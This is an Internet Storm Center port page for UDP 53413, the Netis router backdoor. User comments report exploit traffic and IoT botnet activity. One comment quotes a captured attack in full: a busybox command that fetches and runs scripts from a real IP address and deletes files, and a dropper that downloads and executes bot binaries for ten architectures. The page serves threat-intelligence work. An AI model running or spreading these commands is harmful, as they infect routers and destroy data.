Internet Storm Center

Handler on Duty: Didier Stevens

Threat Level: green

Loading...

[get complete service list]

Port Information
Protocol	Service	Name
tcp	---	---

Top IPs Scanning
Today	Yesterday

Port diary mentions
URL
Surge in Exploit Attempts for Netis Router Backdoor (UDP53413)

User Comments
Submitted By	Date
Comment
	2024-07-22 12:13:35
This busybox command was sent to UDP socket: cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd /; wget http://5.59.248.206/8UsA.sh; curl -O http://5.59.248.206/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 5.59.248.206 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 5.59.248.206; chmod 777 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anonymous -p anonymous -P 21 5.59.248.206 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh; rm -rf * 8UsA.sh file tries to load and execute backdoor for 10 different architectures: #!/bin/bash cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd /; wget http://5.59.248.206/IGz.x86; curl -O http://5.59.248.206/IGz.x86;cat IGz.x86 >Coco.Telnet;chmod +x ;./Coco.Telnet Coco.Telnet cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd /; wget http://5.59.248.206/IGz.mips; curl -O http://5.59.248.206/IGz.mips;cat IGz.mips >Coco.Telnet;chmod +x ;./Coco.Telnet Coco.Telnet cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd /; wget http://5.59.248.206/IGz.mpsl; curl -O http://5.59.248.206/IGz.mpsl;cat IGz.mpsl >Coco.Telnet;chmod +x ;./Coco.Telnet Coco.Telnet cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd /; wget http://5.59.248.206/IGz.arm; curl -O http://5.59.248.206/IGz.arm;cat IGz.arm >Coco.Telnet;chmod +x ;./Coco.Telnet Coco.Telnet cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd /; wget http://5.59.248.206/IGz.arm5; curl -O http://5.59.248.206/IGz.arm5;cat IGz.arm5 >Coco.Telnet;chmod +x ;./Coco.Telnet Coco.Telnet cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd /; wget http://5.59.248.206/IGz.arm6; curl -O http://5.59.248.206/IGz.arm6;cat IGz.arm6 >Coco.Telnet;chmod +x ;./Coco.Telnet Coco.Telnet cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd /; wget http://5.59.248.206/IGz.arm7; curl -O http://5.59.248.206/IGz.arm7;cat IGz.arm7 >Coco.Telnet;chmod +x ;./Coco.Telnet Coco.Telnet cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd /; wget http://5.59.248.206/IGz.ppc; curl -O http://5.59.248.206/IGz.ppc;cat IGz.ppc >Coco.Telnet;chmod +x ;./Coco.Telnet Coco.Telnet cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd /; wget http://5.59.248.206/IGz.m68k; curl -O http://5.59.248.206/IGz.m68k;cat IGz.m68k >Coco.Telnet;chmod +x ;./Coco.Telnet Coco.Telnet cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd /; wget http://5.59.248.206/IGz.sh4; curl -O http://5.59.248.206/IGz.sh4;cat IGz.sh4 >Coco.Telnet;chmod +x ;./Coco.Telnet Coco.Telnet
	2016-08-01 00:23:46
The devices causing this traffic seem to be IoT devices (DVR's IPCAM's etc.), possibly part of LizzardStresser or another botnet based on it
	2016-02-03 10:29:11
This appears to be an attack against netcore routers - udp port 53413. It attempts to run various busybox / shell commands.

CVE Links
CVE #	Description